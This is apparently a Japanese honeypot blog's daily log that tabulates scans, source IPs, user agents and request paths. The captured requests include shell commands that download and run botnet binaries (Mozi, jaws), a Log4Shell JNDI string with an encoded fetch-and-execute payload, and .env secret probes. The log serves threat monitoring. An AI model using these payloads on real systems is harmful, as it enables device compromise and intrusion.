2022/01/28 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/01/28分です。

特徴

共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為

Location:JP

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  212.192.216.46/bins/arm;
chmod 777 /tmp/arm;
sh /tmp/arm selfrep.jaws

Location:US

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
UserAgentがHello, Worldであるアクセス

を確認しました。

Location:UK

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
Nmap Scripting Engineによるスキャン行為
/.gitへのスキャン行為
Laravelへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 0.0.0.0/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:SG

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
curlによるスキャン行為
.cssへのスキャン行為
/.gitへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

を確認しました。

他

アクセス数推移

JP：総アクセス数：181 (前日比：-71)
US：総アクセス数：93 (前日比：53)
UK：総アクセス数：111 (前日比：-39)
SG：総アクセス数：175 (前日比：-57)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	4.14.70.9	United States
4	18.194.209.53	United States
1	20.119.40.11	United States
12	45.146.165.37	Russia
2	52.255.236.247	United States
1	61.219.11.151	Taiwan
4	80.82.77.33	United Kingdom
1	106.75.85.103	China
1	107.189.28.51	United States
4	107.189.29.181	United States
1	109.237.103.123	Russia
1	112.247.215.224	China
1	120.85.114.177	China
1	123.10.222.188	China
15	135.125.246.189	France
1	159.223.184.203	United States
1	165.22.123.117	United States
1	172.104.131.24	United States
1	173.249.10.27	Germany
1	174.138.40.190	United States
1	178.239.21.85	Poland
105	179.43.187.233	Panama
1	181.214.206.161	United States
1	182.215.142.220	South Korea
8	185.254.196.218	Ukraine
1	188.166.182.77	United States
1	192.241.226.74	United States
2	193.32.164.51	Russia
1	206.189.226.17	United States
2	206.189.226.24	United States
1	206.189.226.33	United States
1	206.189.226.57	United States
1	209.17.96.2	United States

UserAgent一覧

件数	UserAgent
14	`-`
105	`Go-http-client/1.1`
1	`Hello, World`
5	`Mozila/5.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36`
12	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
40	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`lynx`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`ABCDEFGHIJKLMNOPQRSTUVWXYZ9999`
2		`\x03`
2		`\x16\x03\x01\x01\xfa\x01`
1		`\x16\x03\x01`
39	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`//main[.]php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/Dumper`	HTTP/1.1
1	GET	`/MSD`	HTTP/1.1
1	GET	`/MySQLDumper`	HTTP/1.1
1	GET	`/MySQL`	HTTP/1.1
1	GET	`/SQLite-Manager/main.php`	HTTP/1.1
1	GET	`/SQLite/SQLite-Manager/main.php`	HTTP/1.1
1	GET	`/SQLite/SQLite-manager/main.php`	HTTP/1.1
1	GET	`/SQLite/SQLiteManager-1.0.4/main.php`	HTTP/1.1
1	GET	`/SQLite/SQLiteManager-1.0.5/main.php`	HTTP/1.1
1	GET	`/SQLite/SQLiteManager-1.0.6/main.php`	HTTP/1.1
1	GET	`/SQLite/SQLiteManager-1.1.0/main.php`	HTTP/1.1
1	GET	`/SQLite/SQLiteManager-1.1.1/main.php`	HTTP/1.1
1	GET	`/SQLite/SQLiteManager-1.1.2/main.php`	HTTP/1.1
1	GET	`/SQLite/SQLiteManager-1.1.3/main.php`	HTTP/1.1
1	GET	`/SQLite/SQLiteManager-1.2.0/main.php`	HTTP/1.1
1	GET	`/SQLite/SQLiteManager-1.2.2/main.php`	HTTP/1.1
1	GET	`/SQLite/SQLiteManager-1.2.3/main.php`	HTTP/1.1
1	GET	`/SQLite/SQLiteManager-1.2.4/main.php`	HTTP/1.1
1	GET	`/SQLite/SQLitemanager/main.php`	HTTP/1.1
1	GET	`/SQLite/sqlite-manager/main.php`	HTTP/1.1
1	GET	`/SQLite/sqlitemanager/main.php`	HTTP/1.1
1	GET	`/SQLiteManager-1.0.4/main.php`	HTTP/1.1
1	GET	`/SQLiteManager-1.0.5/main.php`	HTTP/1.1
1	GET	`/SQLiteManager-1.0.6/main.php`	HTTP/1.1
1	GET	`/SQLiteManager-1.1.0/main.php`	HTTP/1.1
1	GET	`/SQLiteManager-1.1.1/main.php`	HTTP/1.1
1	GET	`/SQLiteManager-1.1.2/main.php`	HTTP/1.1
1	GET	`/SQLiteManager-1.1.3/main.php`	HTTP/1.1
1	GET	`/SQLiteManager-1.2.0/main.php`	HTTP/1.1
1	GET	`/SQLiteManager-1.2.2/main.php`	HTTP/1.1
1	GET	`/SQLiteManager-1.2.3/main.php`	HTTP/1.1
1	GET	`/SQLiteManager-1.2.4/main.php`	HTTP/1.1
2	GET	`/SQLiteManager/main.php`	HTTP/1.1
1	GET	`/SQlite/main.php`	HTTP/1.1
2	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/admin-console/login.seam`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=user&psd=user`	HTTP/1.0
2	GET	`/console/`	HTTP/1.1
1	GET	`/db/main.php`	HTTP/1.1
1	GET	`/dbmanager/main.php`	HTTP/1.1
1	GET	`/dump`	HTTP/1.1
1	GET	`/dumper`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/hudson/login`	HTTP/1.1
1	GET	`/hudson/script`	HTTP/1.1
1	GET	`/invoker/JMXInvokerServlet`	HTTP/1.1
1	GET	`/jenkins/login`	HTTP/1.1
1	GET	`/jenkins/script`	HTTP/1.1
1	GET	`/jenkins`	HTTP/1.1
1	GET	`/jmx-console/`	HTTP/1.1
1	GET	`/login`	HTTP/1.1
1	GET	`/manager/html/`	HTTP/1.1
1	GET	`/manager/main.php`	HTTP/1.1
1	GET	`/msd1.21`	HTTP/1.1
1	GET	`/msd1.24.4`	HTTP/1.1
1	GET	`/msd1.24stable`	HTTP/1.1
1	GET	`/msd`	HTTP/1.1
1	GET	`/msddump`	HTTP/1.1
1	GET	`/msddumper`	HTTP/1.1
1	GET	`/msdump`	HTTP/1.1
1	GET	`/mySQLDumper`	HTTP/1.1
1	GET	`/mySQLmanager`	HTTP/1.1
1	GET	`/mySqlDumper`	HTTP/1.1
1	GET	`/mysql/`	HTTP/1.1
1	GET	`/mysql`	HTTP/1.1
1	GET	`/mysqldump`	HTTP/1.1
1	GET	`/mysqldumper`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/script`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.46/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep[.]jaws`
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/sql/main.php`	HTTP/1.1
1	GET	`/sql`	HTTP/1.1
1	GET	`/sqladmin`	HTTP/1.1
1	GET	`/sqlite-manager/main.php`	HTTP/1.1
1	GET	`/sqlite/SQLite-Manager/main.php`	HTTP/1.1
1	GET	`/sqlite/SQLite-manager/main.php`	HTTP/1.1
1	GET	`/sqlite/SQLiteManager-1.0.4/main.php`	HTTP/1.1
1	GET	`/sqlite/SQLiteManager-1.0.5/main.php`	HTTP/1.1
1	GET	`/sqlite/SQLiteManager-1.0.6/main.php`	HTTP/1.1
1	GET	`/sqlite/SQLiteManager-1.1.0/main.php`	HTTP/1.1
1	GET	`/sqlite/SQLiteManager-1.1.1/main.php`	HTTP/1.1
1	GET	`/sqlite/SQLiteManager-1.1.2/main.php`	HTTP/1.1
1	GET	`/sqlite/SQLiteManager-1.1.3/main.php`	HTTP/1.1
1	GET	`/sqlite/SQLiteManager-1.2.0/main.php`	HTTP/1.1
1	GET	`/sqlite/SQLiteManager-1.2.2/main.php`	HTTP/1.1
1	GET	`/sqlite/SQLiteManager-1.2.3/main.php`	HTTP/1.1
1	GET	`/sqlite/SQLiteManager-1.2.4/main.php`	HTTP/1.1
1	GET	`/sqlite/SQLitemanager/main.php`	HTTP/1.1
1	GET	`/sqlite/main.php`	HTTP/1.1
1	GET	`/sqlite/sqlite-manager/main.php`	HTTP/1.1
1	GET	`/sqlite/sqlitemanager/main.php`	HTTP/1.1
1	GET	`/sqlitemanager-1.0.4/main.php`	HTTP/1.1
1	GET	`/sqlitemanager-1.0.5/main.php`	HTTP/1.1
1	GET	`/sqlitemanager-1.0.6/main.php`	HTTP/1.1
1	GET	`/sqlitemanager-1.1.0/main.php`	HTTP/1.1
1	GET	`/sqlitemanager-1.1.1/main.php`	HTTP/1.1
1	GET	`/sqlitemanager-1.1.2/main.php`	HTTP/1.1
1	GET	`/sqlitemanager-1.1.3/main.php`	HTTP/1.1
1	GET	`/sqlitemanager-1.2.0/main.php`	HTTP/1.1
1	GET	`/sqlitemanager-1.2.2/main.php`	HTTP/1.1
1	GET	`/sqlitemanager-1.2.3/main.php`	HTTP/1.1
1	GET	`/sqlitemanager-1.2.4/main.php`	HTTP/1.1
2	GET	`/sqlitemanager/main.php`	HTTP/1.1
1	GET	`/sqlmanager/main.php`	HTTP/1.1
1	GET	`/sqlmanager`	HTTP/1.1
1	GET	`/sqlweb`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/web-console/`	HTTP/1.1
1	GET	`/websql`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	HEAD	`/robots.txt`	HTTP/1.0
1	OPTIONS	`/`	HTTP/1.1
1	POST	`/.env`	HTTP/1.1
1	POST	`/10`	HTTP/1.1
2	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
5	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	8.45.145.16	United States
2	13.90.227.211	United States
1	20.117.83.152	United States
1	23.95.100.47	United States
3	31.7.57.130	Panama
8	45.146.165.37	Russia
5	51.79.29.48	Canada
2	52.211.35.144	United States
40	54.158.96.195	United States
1	61.219.11.151	Taiwan
2	62.171.132.199	Germany
4	106.75.2.164	China
1	107.189.28.51	United States
1	111.118.106.143	South Korea
1	115.206.223.49	China
1	117.50.110.69	China
1	119.179.254.225	China
1	143.198.183.232	United States
1	146.19.191.121	United States
2	157.245.70.127	United States
1	159.65.32.105	United States
1	172.104.131.24	United States
1	178.239.21.85	Poland
1	181.214.41.111	Brazil
1	182.126.114.41	China
2	185.196.220.62	Netherlands
1	193.189.100.203	United Kingdom
1	206.189.226.33	United States
1	206.189.226.57	United States
1	206.189.226.63	United States
1	209.17.96.226	United States
2	212.193.30.18	Czechia

UserAgent一覧

件数	UserAgent
8	`-`
1	`Go-http-client/1.1`
3	`Hello, World`
2	`Mozila/5.0`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36`
4	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
40	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
15	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
5	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
1	`lynx`
1	`t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//191[.]232[.]36[.]83:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzEzNC4yMDkuNDIuMTU1LzhVc0Euc2g7IGN1cmwgLU8gaHR0cDovLzEzNC4yMDkuNDIuMTU1LzhVc0Euc2g7IGNobW9kIDc3NyA4VXNBLnNoOyBzaCA4VXNBLnNo}')`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`ABCDEFGHIJKLMNOPQRSTUVWXYZ9999`
1		`\x16\x03\x01`
16	GET	`/.env`	HTTP/1.1
1	GET	`//.well-known/security.txt`	HTTP/1.1
1	GET	`//robots[.]txt`	HTTP/1.1
1	GET	`//sitemap[.]xml`	HTTP/1.1
1	GET	`/:80:undefined`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/application/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/auth/.env`	HTTP/1.1
1	GET	`/back/.env`	HTTP/1.1
1	GET	`/backend/.env`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=adminisp&psd=adminisp`	HTTP/1.0
1	GET	`/boaform/admin/formLogin?username=ec8&psd=ec8`	HTTP/1.0
1	GET	`/cli/.env`	HTTP/1.1
1	GET	`/config/.env`	HTTP/1.1
5	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/cp/.env`	HTTP/1.1
1	GET	`/dependencies/.env`	HTTP/1.1
1	GET	`/deployment/.env`	HTTP/1.1
1	GET	`/dev/.env`	HTTP/1.1
1	GET	`/development/.env`	HTTP/1.1
1	GET	`/docker/.env`	HTTP/1.1
1	GET	`/document/.env`	HTTP/1.1
1	GET	`/engine/.env`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/framework/.env`	HTTP/1.1
1	GET	`/frontend/.env`	HTTP/1.1
1	GET	`/laravel-artisa/.env`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/login/.env`	HTTP/1.1
1	GET	`/master/.env`	HTTP/1.1
1	GET	`/personal/.env`	HTTP/1.1
1	GET	`/private/.env`	HTTP/1.1
1	GET	`/project/.env`	HTTP/1.1
1	GET	`/protected/.env`	HTTP/1.1
1	GET	`/rest/.env`	HTTP/1.1
1	GET	`/search/.env`	HTTP/1.1
1	GET	`/server/.env`	HTTP/1.1
1	GET	`/shared/.env`	HTTP/1.1
1	GET	`/site/.env`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/src/.env`	HTTP/1.1
1	GET	`/system/.env`	HTTP/1.1
2	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vod_installer/.env`	HTTP/1.1
1	GET	`/vue/.env`	HTTP/1.1
1	GET	`/web/.env`	HTTP/1.1
1	GET	`http[:]//azenv[.]net/`	HTTP/1.1
1	HEAD	`/robots.txt`	HTTP/1.0
1	POST	`/10`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
2	POST	`/GponForm/diag_Form?script/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
2	POST	`/HNAP1/`	HTTP/1.1
2	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
3	2.57.122.80	Romania
1	20.117.83.152	United States
1	31.7.57.130	Panama
1	35.182.47.9	United States
11	45.146.165.37	Russia
4	62.171.132.199	Germany
1	64.225.75.232	United States
1	66.240.192.82	United States
2	94.232.43.63	Russia
2	107.189.28.51	United States
1	109.237.103.123	Russia
1	113.87.157.129	China
1	113.220.25.161	China
4	121.121.90.84	Malaysia
1	141.98.81.139	Panama
61	150.136.181.131	United States
2	157.245.70.127	United States
4	164.52.24.179	China
1	172.105.89.161	United States
1	193.32.164.51	Russia
3	193.142.146.229	Germany
1	209.17.96.226	United States
1	212.192.241.207	Czechia
1	221.15.238.227	China
1	222.187.225.5	China

UserAgent一覧

件数	UserAgent
14	`-`
4	`Hello, World`
2	`Hello, world`
2	`Mozila/5.0`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36`
4	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
5	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
61	`Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)`

リクエスト内容一覧

件数	Method	Request	Protocol
4		`\x03`
1		`\x16\x03\x01\x01`	\x01
5		`\x16\x03\x01`
1	FKWR	`/`	HTTP/1.1
6	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.sendgrid`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
2	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/admin/info/config`	HTTP/1.1
1	GET	`/api/spec.json`	HTTP/1.1
5	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.php`	HTTP/1.1
1	GET	`/nmaplowercheck1643267188`	HTTP/1.1
1	GET	`/opc/v1/identity`	HTTP/1.1
1	GET	`/opc/v1/instance`	HTTP/1.1
1	GET	`/phpmyadmin/index.php`	HTTP/1.1
1	GET	`/phpmyadmin4.8.5/index.php`	HTTP/1.1
1	GET	`/pmd/index.php`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sendgrid.env`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/spec/api.json`	HTTP/1.1
1	GET	`/ui`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	HEAD	`/actuator/auditevents`	HTTP/1.1
1	HEAD	`/actuator/beans`	HTTP/1.1
1	HEAD	`/actuator/conditions`	HTTP/1.1
1	HEAD	`/actuator/configprops`	HTTP/1.1
1	HEAD	`/actuator/env`	HTTP/1.1
1	HEAD	`/actuator/health`	HTTP/1.1
1	HEAD	`/actuator/heapdump`	HTTP/1.1
1	HEAD	`/actuator/httptrace`	HTTP/1.1
1	HEAD	`/actuator/hystrix.stream`	HTTP/1.1
1	HEAD	`/actuator/info`	HTTP/1.1
1	HEAD	`/actuator/jolokia`	HTTP/1.1
1	HEAD	`/actuator/loggers`	HTTP/1.1
1	HEAD	`/actuator/mappings`	HTTP/1.1
1	HEAD	`/actuator/metrics`	HTTP/1.1
1	HEAD	`/actuator/scheduledtasks`	HTTP/1.1
1	HEAD	`/actuator/threaddump`	HTTP/1.1
1	HEAD	`/actuator`	HTTP/1.1
1	HEAD	`/auditevents`	HTTP/1.1
1	HEAD	`/autoconfig`	HTTP/1.1
1	HEAD	`/beans`	HTTP/1.1
1	HEAD	`/cloudfoundryapplication`	HTTP/1.1
1	HEAD	`/configprops`	HTTP/1.1
1	HEAD	`/dump`	HTTP/1.1
1	HEAD	`/env`	HTTP/1.1
1	HEAD	`/health`	HTTP/1.1
1	HEAD	`/heapdump`	HTTP/1.1
1	HEAD	`/hystrix.stream`	HTTP/1.1
1	HEAD	`/info`	HTTP/1.1
1	HEAD	`/jolokia`	HTTP/1.1
1	HEAD	`/loggers`	HTTP/1.1
1	HEAD	`/mappings`	HTTP/1.1
1	HEAD	`/metrics`	HTTP/1.1
1	HEAD	`/threaddump`	HTTP/1.1
1	HEAD	`/trace`	HTTP/1.1
11	OPTIONS	`/`	HTTP/1.1
2	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
3	POST	`/GponForm/diag_Form?script/`	HTTP/1.1
2	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
2	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	PROPFIND	`/`	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
40	3.82.151.239	United States
1	4.17.224.133	United States
1	20.55.53.144	United States
1	20.117.83.152	United States
63	20.124.222.59	United States
1	31.7.57.130	Panama
9	45.146.165.37	Russia
2	49.71.114.105	China
6	51.79.29.48	Canada
1	60.217.75.69	China
1	62.210.10.77	France
1	74.91.115.181	United States
2	94.232.43.63	Russia
2	104.129.30.164	United States
2	107.189.28.51	United States
1	109.237.103.9	Russia
1	109.237.103.123	Russia
1	120.52.152.20	China
1	134.122.63.202	United States
2	142.11.239.62	United States
1	143.198.183.232	United States
1	146.19.191.121	United States
1	159.203.68.132	United States
1	159.223.178.212	United States
1	172.104.131.24	United States
26	178.79.148.229	United States
1	181.214.41.111	Brazil
1	181.214.206.161	United States
1	206.189.226.57	United States
1	206.189.226.63	United States
1	209.17.96.170	United States

UserAgent一覧

件数	UserAgent
10	`-`
1	`Go-http-client/1.1`
3	`Mozila/5.0`
63	`Mozilla/5.0 (Linux i386; X11) Gecko/20061505 Firefox/20.0`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
40	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0`
2	`Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
16	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
25	`curl/7.54.0`
1	`t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//191[.]232[.]36[.]83:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzEzNC4yMDkuNDIuMTU1LzhVc0Euc2g7IGN1cmwgLU8gaHR0cDovLzEzNC4yMDkuNDIuMTU1LzhVc0Euc2g7IGNobW9kIDc3NyA4VXNBLnNoOyBzaCA4VXNBLnNo}')`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`ABCDEFGHIJKLMNOPQRSTUVWXYZ9999`
1		`SSH-2.0-Go`
2		`\x03`
1		`\x16\x03\x01\x01\xfb\x01`
2		`\x16\x03\x01\x02`
1		`\x16\x03\x01`
18	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.local`	HTTP/1.1
1	GET	`/.production`	HTTP/1.1
1	GET	`/.remote`	HTTP/1.1
1	GET	`//admin/.env`	HTTP/1.1
1	GET	`//administrator/.env`	HTTP/1.1
1	GET	`//api/.env`	HTTP/1.1
1	GET	`//app/.env`	HTTP/1.1
1	GET	`//apps/.env`	HTTP/1.1
1	GET	`//assets/.env`	HTTP/1.1
1	GET	`//config/.env`	HTTP/1.1
1	GET	`//core/.env`	HTTP/1.1
1	GET	`//core/Datavase/.env`	HTTP/1.1
1	GET	`//core/app/.env`	HTTP/1.1
1	GET	`//cron/.env`	HTTP/1.1
1	GET	`//cronlab/.env`	HTTP/1.1
1	GET	`//database/.env`	HTTP/1.1
1	GET	`//en/.env`	HTTP/1.1
1	GET	`//exapi/.env`	HTTP/1.1
1	GET	`//lab/.env`	HTTP/1.1
1	GET	`//laravel/.env`	HTTP/1.1
1	GET	`//lib/.env`	HTTP/1.1
1	GET	`//psnlink/.env`	HTTP/1.1
1	GET	`//public/.env`	HTTP/1.1
1	GET	`//saas/.env`	HTTP/1.1
1	GET	`//site/.env`	HTTP/1.1
1	GET	`//sitemaps/.env`	HTTP/1.1
1	GET	`//tools/.env`	HTTP/1.1
1	GET	`//uploads/.env`	HTTP/1.1
1	GET	`//v1/.env`	HTTP/1.1
1	GET	`//v2/.env`	HTTP/1.1
1	GET	`//vendor/.env`	HTTP/1.1
1	GET	`//web/.env`	HTTP/1.1
1	GET	`/:80:undefined`	HTTP/1.1
